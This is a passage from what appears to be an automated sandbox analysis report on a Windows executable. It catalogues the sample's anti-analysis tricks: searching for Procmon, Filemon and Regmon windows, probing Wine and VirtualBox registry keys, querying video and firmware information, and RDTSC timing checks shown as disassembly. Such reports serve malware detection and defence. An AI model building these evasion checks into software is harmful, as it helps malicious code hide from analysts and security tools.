              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_0559E27A push ecx; retf 0_3_0559E2A0
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_0559DA03 push ecx; retf 0_3_0559E2A0
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_055999BD push esi; retf 0_3_055999C0
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: k7T6akLcAr.exeStatic PE information: section name: entropy: 7.972809484614253

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: DF8DD6 second address: DF8DED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F335854CBBFh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: DF8DED second address: DF8DF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: DF8DF1 second address: DF8E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F335854CBC8h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: DF8E14 second address: DF8E18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F76356 second address: F7635E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F7635E second address: F76362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F76362 second address: F76366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F6E889 second address: F6E88F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F6E88F second address: F6E893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F6E893 second address: F6E89E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F6E89E second address: F6E8AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 jc 00007F335854CBBCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F754D6 second address: F754DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F754DC second address: F75500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F335854CBB6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f jbe 00007F335854CBB6h 0x00000015 js 00007F335854CBB6h 0x0000001b popad 0x0000001c js 00007F335854CBC2h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F75500 second address: F7550D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F335931F146h 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F7566E second address: F75693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F335854CBB6h 0x0000000a jmp 00007F335854CBC7h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F757E4 second address: F757F3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F335931F146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F757F3 second address: F75826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F335854CBC5h 0x00000009 popad 0x0000000a push edx 0x0000000b jc 00007F335854CBB6h 0x00000011 pop edx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007F335854CBBEh 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F75826 second address: F7582B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F75969 second address: F7596D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F75CB5 second address: F75CC1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jp 00007F335931F146h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F75CC1 second address: F75CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F780EE second address: F780F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F781C4 second address: F781EC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F335854CBB8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F335854CBC6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F781EC second address: F781FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F781FD second address: F78218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F335854CBC6h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F78218 second address: F7823C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F335931F14Ah 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 jnc 00007F335931F14Ch 0x00000016 jg 00007F335931F146h 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F782B9 second address: F782F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ecx, 3E1C5CA5h 0x0000000f push 00000000h 0x00000011 jmp 00007F335854CBC3h 0x00000016 push 5114DF00h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F335854CBC0h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F783F2 second address: F78408 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F335931F148h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F78408 second address: F7840C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F7840C second address: F78412 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F784C0 second address: F784C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F784C6 second address: F7850A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dword ptr [ebp+122D1DB9h], ecx 0x00000010 call 00007F335931F151h 0x00000015 stc 0x00000016 pop edx 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+122D2D78h], ebx 0x0000001f push 158484F3h 0x00000024 je 00007F335931F152h 0x0000002a jnp 00007F335931F14Ch 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F895EE second address: F895F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F962BD second address: F962DA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F335931F146h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnl 00007F335931F146h 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F96575 second address: F96579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F966CE second address: F966ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F335931F150h 0x00000009 pop esi 0x0000000a jmp 00007F335931F14Ah 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F966ED second address: F96711 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F335854CBB6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F96842 second address: F96848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F96848 second address: F96856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F335854CBB6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F96F38 second address: F96F53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F335931F153h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F96F53 second address: F96F59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F96F59 second address: F96F64 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 ja 00007F335931F146h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F8BAA6 second address: F8BAAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F8BAAC second address: F8BADC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F335931F15Ch 0x00000010 jmp 00007F335931F154h 0x00000015 push esi 0x00000016 pop esi 0x00000017 jg 00007F335931F14Ah 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F9709E second address: F970BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F97AF2 second address: F97AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F97AFD second address: F97B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F97B01 second address: F97B05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F9BA35 second address: F9BA39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F9BBED second address: F9BBFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [esp+04h] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F335931F146h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F9BBFF second address: F9BC19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F9BC19 second address: F9BC3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jc 00007F335931F14Ch 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jng 00007F335931F14Eh 0x00000022 push edi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F62E7F second address: F62E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jns 00007F335854CBB6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 je 00007F335854CBB6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F62E97 second address: F62EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F335931F159h 0x0000000d jno 00007F335931F146h 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA2841 second address: FA287E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F335854CBC8h 0x00000009 jmp 00007F335854CBBEh 0x0000000e popad 0x0000000f push ecx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jo 00007F335854CBB6h 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b jc 00007F335854CBB6h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA2A27 second address: FA2A2C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA2A2C second address: FA2A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F335854CBC0h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA2CEA second address: FA2D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F335931F156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA2D06 second address: FA2D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA2D11 second address: FA2D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA300A second address: FA3010 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA3010 second address: FA301C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F335931F146h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA301C second address: FA3020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA3020 second address: FA3051 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F151h 0x00000007 jmp 00007F335931F151h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jo 00007F335931F146h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA3051 second address: FA3077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F335854CBBBh 0x0000000e jno 00007F335854CBC2h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA3077 second address: FA3082 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F335931F146h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA3347 second address: FA334D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA334D second address: FA3351 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA3351 second address: FA3361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F335854CBB6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA4A9E second address: FA4AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA4AA2 second address: FA4ACD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F335854CBC6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA4ACD second address: FA4AF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 2B524AD0h 0x0000000e mov di, F672h 0x00000012 call 00007F335931F149h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jnp 00007F335931F146h 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA4AF4 second address: FA4AF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA4AF9 second address: FA4AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA4AFF second address: FA4B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F335854CBB8h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA4B11 second address: FA4B16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
